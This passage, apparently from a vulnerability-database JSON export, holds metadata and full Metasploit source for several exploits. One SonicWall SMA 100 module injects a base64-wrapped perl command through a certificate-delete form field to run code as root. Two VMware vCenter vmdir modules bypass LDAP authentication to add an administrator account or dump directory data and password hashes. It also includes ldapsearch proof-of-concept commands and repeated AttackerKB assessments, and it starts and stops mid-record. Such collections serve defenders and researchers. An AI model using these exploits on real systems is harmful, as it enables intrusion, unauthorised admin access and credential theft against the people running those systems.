Mobile Connect',\n 'vars_post' =>\n {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'domain' => datastore['SWDOMAIN'],\n 'portalname' => datastore['PORTALNAME'],\n 'login' => 'true',\n 'verifyCert' => '0',\n 'ajax' => 'true'\n },\n 'keep_cookies' => true\n })\n\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\n fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')\n print_good('Authentication successful')\n end\n\n ##\n # Send the exploit in the \"CERT\" field when \"deleting\" a certificate. The\n # backend requires the payload start with \"n\". Also, there is a very small\n # amount of space to fit the command into (otherwise we'll trigger a bof).\n # Finally! The command has a lot of disallowed characters: /$&|>;`^. Which\n # is problematically for basically all the payloads. The system also is\n # missing useful tools like wget, base64, and curl (10.2 has curl but\n # whatever). As such, it seemed the easiest thing to do is wrap the entire\n # command in base64 and then use perl to decode/execute it.\n ##\n def execute_command(cmd, _opts = {})\n cmd_encoded = Rex::Text.encode_base64(cmd)\n perl_eval = \"n\\nperl -MMIME::Base64 -e 'system(decode_base64(\\\"#{cmd_encoded}\\\"))'\"\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part('delete', nil, nil, 'form-data; name=\"buttontype\"')\n multipart_form.add_part(perl_eval, nil, nil, 'form-data; name=\"CERT\"')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'),\n 'agent' => 'SonicWALL Mobile Connect',\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n }, 5)\n\n if res && res.code != 200\n # the response should always be 200, unless meterpreter holds the\n # connection open.\n fail_with(Failure::UnexpectedReply, 'Only expected 200 OK')\n end\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n login\n execute_cmdstager(linemax: 40)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/sonicwall_cve_2021_20039.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:40:34", "description": "This module bypasses LDAP authentication in VMware vCenter Server's vmdir service to add an arbitrary administrator user. Version 6.7 prior to the 6.7U3f update is vulnerable, only if upgraded from a previous release line, such as 6.0 or 6.5. Note that it is also possible to provide a bind username and password to authenticate if the target is not vulnerable. It will add an arbitrary administrator user the same way.\n", "cvss3": {}, "published": "2020-04-22T22:38:11", "type": "metasploit", "title": "VMware vCenter Server vmdir Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-12T15:51:40", "id": "MSF:AUXILIARY-ADMIN-LDAP-VMWARE_VCENTER_VMDIR_AUTH_BYPASS-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server vmdir Authentication Bypass',\n 'Description' => %q{\n This module bypasses LDAP authentication in VMware vCenter Server's\n vmdir service to add an arbitrary administrator user. Version 6.7\n prior to the 6.7U3f update is vulnerable, only if upgraded from a\n previous release line, such as 6.0 or 6.5.\n Note that it is also possible to provide a bind username and password\n to authenticate if the target is not vulnerable. It will add an\n arbitrary administrator user the same way.\n },\n 'Author' => [\n 'Hynek Petrak', # Discovery\n 'JJ Lehmann', # Analysis and PoC\n 'Ofri Ziv', # Analysis and PoC\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-3952'],\n ['URL', 'https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html'],\n ['URL', 'https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md']\n ],\n 'DisclosureDate' => '2020-04-09', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Add', { 'Description' => 'Add an admin user' }]\n ],\n 'DefaultAction' => 'Add',\n 'DefaultOptions' => {\n 'SSL' => true,\n 'CheckModule' => 'auxiliary/gather/vmware_vcenter_vmdir_ldap'\n },\n 'Notes' => {\n 'Stability' => [SERVICE_RESOURCE_LOSS],\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],\n 'Reliability' => []\n }\n )\n )\n\n register_options([\n Opt::RPORT(636), # SSL/TLS\n OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),\n OptString.new('USERNAME', [false, 'Username of admin user to add']),\n OptString.new('PASSWORD', [false, 'Password of admin user to add'])\n ])\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def base_dn\n @base_dn ||= 'dc=vsphere,dc=local'\n end\n\n def user_dn\n \"cn=#{username},cn=Users,#{base_dn}\"\n end\n\n def group_dn\n \"cn=Administrators,cn=Builtin,#{base_dn}\"\n end\n\n def run\n unless username && password\n print_error('Please set the USERNAME and PASSWORD options to proceed')\n return\n end\n\n # NOTE: check is provided by auxiliary/gather/vmware_vcenter_vmdir_ldap\n checkcode = check\n\n return unless checkcode == Exploit::CheckCode::Vulnerable\n\n if (@base_dn = datastore['BASE_DN'])\n print_status(\"User-specified base DN: #{base_dn}\")\n else\n # HACK: We stashed the detected base DN in the CheckCode's reason\n @base_dn = checkcode.reason\n end\n\n ldap_connect do |ldap|\n print_status(\"Bypassing LDAP auth in vmdir service at #{peer}\")\n auth_bypass(ldap)\n\n print_status(\"Adding admin user #{username} with password #{password}\")\n\n unless add_admin(ldap)\n print_error(\"Failed to add admin user #{username}\")\n end\n end\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n end\n\n # This will always return false, since the creds are invalid\n def auth_bypass(ldap)\n # when datastore['BIND_DN'] has been provided in options,\n # ldap_connect has already made a bind for us.\n return if datastore['BIND_DN']\n\n ldap.bind(\n method: :simple,\n username: Rex::Text.rand_text_alphanumeric(8..42),\n password: Rex::Text.rand_text_alphanumeric(8..42)\n )\n end\n\n def add_admin(ldap)\n user_info = {\n 'objectClass' => %w[top person organizationalPerson user],\n 'cn' => username,\n 'sn' => 'vsphere.local',\n 'givenName' => username,\n 'sAMAccountName' => username,\n 'userPrincipalName' => \"#{username}@VSPHERE.LOCAL\",\n 'uid' => username,\n 'userPassword' => password\n }\n\n # Add our new user\n unless ldap.add(dn: user_dn, attributes: user_info)\n res = ldap.get_operation_result\n\n case res.code\n when Net::LDAP::ResultCodeInsufficientAccessRights\n print_error('Failed to bypass LDAP auth in vmdir service')\n when Net::LDAP::ResultCodeEntryAlreadyExists\n print_error(\"User #{username} already exists\")\n when Net::LDAP::ResultCodeConstraintViolation\n print_error(\"Password #{password} does not meet policy requirements\")\n else\n print_error(\"#{res.message}: #{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username}, so auth bypass was successful!\")\n\n # Add our user to the admin group\n unless ldap.add_attribute(group_dn, 'member', user_dn)\n res = ldap.get_operation_result\n\n if res.code == Net::LDAP::ResultCodeAttributeOrValueExists\n print_error(\"User #{username} is already an admin\")\n else\n print_error(\"#{res.message}: #{res.error_message}\")\n end\n\n return false\n end\n\n print_good(\"Added user #{username} to admin group\")\n\n true\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:40:37", "description": "This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5. If the bind username and password are provided (BIND_DN and BIND_PW options), these credentials will be used instead of attempting an anonymous bind.\n", "cvss3": {}, "published": "2020-04-22T22:38:12", "type": "metasploit", "title": "VMware vCenter Server vmdir Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2022-01-12T15:51:40", "id": "MSF:AUXILIARY-GATHER-VMWARE_VCENTER_VMDIR_LDAP-", "href": "https://www.rapid7.com/db/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/hashes/identify'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server vmdir Information Disclosure',\n 'Description' => %q{\n This module uses an anonymous-bind LDAP connection to dump data from\n the vmdir service in VMware vCenter Server version 6.7 prior to the\n 6.7U3f update, only if upgraded from a previous release line, such as\n 6.0 or 6.5.\n If the bind username and password are provided (BIND_DN and BIND_PW\n options), these credentials will be used instead of attempting an\n anonymous bind.\n },\n 'Author' => [\n 'Hynek Petrak', # Discovery, hash dumping\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-3952'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0006.html']\n ],\n 'DisclosureDate' => '2020-04-09', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', { 'Description' => 'Dump all LDAP data' }]\n ],\n 'DefaultAction' => 'Dump',\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS],\n 'Reliability' => []\n }\n )\n )\n\n register_options([\n Opt::RPORT(636), # SSL/TLS\n OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it'])\n ])\n end\n\n def base_dn\n @base_dn ||= 'dc=vsphere,dc=local'\n end\n\n def policy_dn\n \"cn=password and lockout policy,#{base_dn}\"\n end\n\n # PoC using ldapsearch(1):\n #\n # Retrieve root DSE with base DN:\n # ldapsearch -xb \"\" -s base -H ldap://[redacted]\n #\n # Dump data using discovered base DN:\n # ldapsearch -xb dc=vsphere,dc=local -H ldap://[redacted] \\* + -\n def run\n entries = nil\n\n ldap_connect do |ldap|\n if (@base_dn = datastore['BASE_DN'])\n print_status(\"User-specified base DN: #{base_dn}\")\n else\n print_status('Discovering base DN automatically')\n\n unless (@base_dn = discover_base_dn(ldap))\n print_warning('Falling back on default base DN dc=vsphere,dc=local')\n end\n end\n\n print_status(\"Dumping LDAP data from vmdir service at #{peer}\")\n\n # A \"-\" meta-attribute will dump userPassword (hat tip Hynek)\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/ldap-head/result.c#L647-L654\n entries = ldap.search(base: base_dn, attributes: %w[* + -])\n end\n\n # Look for an entry with a non-empty vmwSTSPrivateKey attribute\n unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }\n print_error(\"#{peer} is NOT vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n print_error('Dump failed')\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"#{peer} is vulnerable to CVE-2020-3952\") unless datastore['BIND_PW'].present?\n pillage(entries)\n\n # HACK: Stash discovered base DN in CheckCode reason\n Exploit::CheckCode::Vulnerable(base_dn)\n rescue Net::LDAP::Error => e\n print_error(\"#{e.class}: #{e.message}\")\n Exploit::CheckCode::Unknown\n end\n\n def pillage(entries)\n # TODO: Make this more efficient?\n ldif = entries.map(&:to_ldif).map { |s| s.force_encoding('utf-8') }.join(\"\\n\")\n\n print_status('Storing LDAP data in loot')\n\n ldif_filename = store_loot(\n name, # ltype\n 'text/plain', # ctype\n rhost, # host\n ldif, # data\n nil, # filename\n \"Base DN: #{base_dn}\" # info\n )\n\n unless ldif_filename\n print_error('Could not store LDAP data in loot')\n return\n end\n\n print_good(\"Saved LDAP data to #{ldif_filename}\")\n\n if (policy = entries.find { |entry| entry.dn == policy_dn })\n print_status('Password and lockout policy:')\n print_line(policy.to_ldif[/^vmwpassword.*/m])\n end\n\n # Process entries with a non-empty userPassword attribute\n process_hashes(entries.select { |entry| entry[:userpassword].any? })\n end\n\n def process_hashes(entries)\n if entries.empty?\n print_status('No password hashes found')\n return\n end\n\n service_details = {\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'vmdir/ldap'\n }\n\n entries.each do |entry|\n # This is the \"username\"\n dn = entry.dn\n\n # https://github.com/vmware/lightwave/blob/3bc154f823928fa0cf3605cc04d95a859a15c2a2/vmdir/server/middle-layer/password.c#L32-L76\n type, hash, salt = entry[:userpassword].first.unpack('CH128H32')\n\n case type\n when 1\n unless hash.length == 128\n vprint_error(\"Type #{type} hash length is not 128 digits (#{dn})\")\n next\n end\n\n unless salt.length == 32\n vprint_error(\"Type #{type} salt length is not 32 digits (#{dn})\")\n next\n end\n\n # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197\n john_hash = \"$dynamic_82$#{hash}$HEX$#{salt}\"\n else\n vprint_error(\"Hash type #{type.inspect} is not supported yet (#{dn})\")\n next\n end\n\n print_good(\"Credentials found: #{dn}:#{john_hash}\")\n\n create_credential(service_details.merge(\n username: dn,\n private_data: john_hash,\n private_type: :nonreplayable_hash,\n jtr_format: identify_hash(john_hash)\n ))\n end\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2022-04-29T16:12:07", "description": "A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server\u2019s mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a \u2018nobody\u2019 user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at January 11, 2022 2:19pm UTC reported:\n\nThis unauthenticated and remote stack-based buffer overflow allows an attacker to execute code on the remote SMA 100 series target. Exploitation can be a challenge though. For additional details, see the Rapid7 analysis.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-20038", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039"], "modified": "2022-01-11T00:00:00", "id": "AKB:1AE51720-4534-42A8-879C-01FFE347E837", "href": "https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:28:08", "description": "Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 16, 2020 1:25pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**busterb** at April 15, 2020 4:15pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**cnotin** at April 16, 2020 2:20pm UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\n**hrbrmstr** at April 18, 2020 11:49am UTC reported:\n\nTechnical details on the vuln are out: <https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/>. It\u2019s quite a bit more than information disclosure. Full auth bypass and the ability to add an arbitrary admin user. I\u2019ve confirmed it myself and added a second [module](<https://github.com/rapid7/metasploit-framework/pull/13253>).\n\nETA: I noted the following in an earlier response here:\n\n> The data seemed to contain secrets related to VMware\u2019s Security Token Service (STS) for single sign-on (SSO).\n\nSo information disclosure is still on the table for obtaining access. Presumably, you would use the STS private key to sign forged SAML tokens used in the STS SSO system. Wanted to update AKB, since we\u2019d been talking about it in work Slack. :)\n\nHats off to the Guardicore team for their dedicated analysis.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-3952 - VMware vCenter Server vmdir Information Disclosure", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952"], "modified": "2020-08-28T00:00:00", "id": "AKB:85036BC9-E798-46CE-A5B3-43BDCFE83346", "href": "https://attackerkb.com/topics/f5Gs82lZKq/cve-2020-3952---vmware-vcenter-server-vmdir-information-disclosure", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-01-14T03:42:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-13T00:00:00", "type": "packetstorm", "title": "SonicWall SMA 100 Series Authenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039"], "modified": "2022-01-13T00:00:00", "id": "PACKETSTORM:165563", "href": "https://packetstormsecurity.com/files/165563/SonicWall-SMA-100-Series-Authenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection', \n'Description' => %q{ \nThis module exploits an authenticated command injection vulnerability \nin the SonicWall SMA 100 series web interface. Exploitation results in \ncommand execution as root. The affected versions are: \n \n- 10.2.1.2-24sv and below \n- 10.2.0.8-37sv and below \n- 9.0.0.11-31sv and below \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'jbaines-r7' # Vulnerability discovery and Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-20039' ], \n[ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'], \n[ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'], \n[ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis'] \n], \n'DisclosureDate' => '2021-12-14', \n'Platform' => ['linux'], \n'Arch' => [ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'echo', 'printf' ] \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'PrependFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), \nOptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']), \nOptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']), \nOptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice']) \n]) \nend \n \n## \n# Extract the version number from a javascript include in the login landing page. \n# And compare the version against known affected. Affected versions are: \n# \n# 10.2.1.2-24sv and below \n# 10.2.0.8-37sv and below \n# 9.0.0.11-31sv and below \n## \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'), \n'agent' => 'SonicWALL Mobile Connect' \n}) \nreturn CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200 \n \nversion = res.body.match(/\\.([0-9.\\-a-z]+)\\.js\" type=/) \nreturn CheckCode::Unknown('Failed to retrieve the version information') unless version \n \nversion = version[1] \n \nmajor, minor, revision, build = version.split('.', 4) \nbuild, point = build.split('-', 2) \nprint_status(\"Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}\") \npoint.delete_suffix('sv') \n \ncase major \nwhen '9' \nreturn CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31 \nwhen '10' \nreturn CheckCode::Safe unless minor.to_i == 2 \n \ncase revision \nwhen '0' \nreturn CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37 \nwhen '1' \nreturn CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24 \nelse \nreturn CheckCode::Safe \nend \nelse \nreturn CheckCode::Safe \nend \nCheckCode::Appears('Based on the discovered version.') \nend \n \ndef login \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'), \n'agent' => 'SonicWALL Mobile Connect', \n'vars_post' => \n{ \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'domain' => datastore['SWDOMAIN'], \n'portalname' => datastore['PORTALNAME'], \n'login' => 'true', \n'verifyCert' => '0', \n'ajax' => 'true' \n}, \n'keep_cookies' => true \n}) \n \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200 \nfail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=') \nprint_good('Authentication successful') \nend \n \n## \n# Send the exploit in the \"CERT\" field when \"deleting\" a certificate. The \n# backend requires the payload start with \"n\". Also, there is a very small \n# amount of space to fit the command into (otherwise we'll trigger a bof). \n# Finally! The command has a lot of disallowed characters: /$&|>;`^. Which \n# is problematically for basically all the payloads. The system also is \n# missing useful tools like wget, base64, and curl (10.2 has curl but \n# whatever). As such, it seemed the easiest thing to do is wrap the entire \n# command in base64 and then use perl to decode/execute it. \n## \ndef execute_command(cmd, _opts = {}) \ncmd_encoded = Rex::Text.encode_base64(cmd) \nperl_eval = \"n\\nperl -MMIME::Base64 -e 'system(decode_base64(\\\"#{cmd_encoded}\\\"))'\" \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part('delete', nil, nil, 'form-data; name=\"buttontype\"') \nmultipart_form.add_part(perl_eval, nil, nil, 'form-data; name=\"CERT\"') \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'), \n'agent' => 'SonicWALL Mobile Connect', \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n}, 5) \n \nif res && res.code != 200 \n# the response should always be 200, unless meterpreter holds the \n# connection open. \nfail_with(Failure::UnexpectedReply, 'Only expected 200 OK') \nend \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \nlogin \nexecute_cmdstager(linemax: 40) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165563/sonicwall_cve_2021_20039.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T02:50:14", "description": "", "published": "2020-06-02T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 6.7 Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3592", "CVE-2020-3952"], "modified": "2020-06-02T00:00:00", "id": "PACKETSTORM:157896", "href": "https://packetstormsecurity.com/files/157896/VMware-vCenter-Server-6.7-Authentication-Bypass.html", "sourceData": "`# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass \n# Date: 2020-06-01 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html \n# Version: vCenter Server 6.7 before update 3f \n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) \n# CVE: CVE-2020-3952 \n \n#!/usr/bin/env python3 \n \n''' \nCopyright 2020 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nBased (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 \n \nFile name CVE-2020-3592.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \n## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on 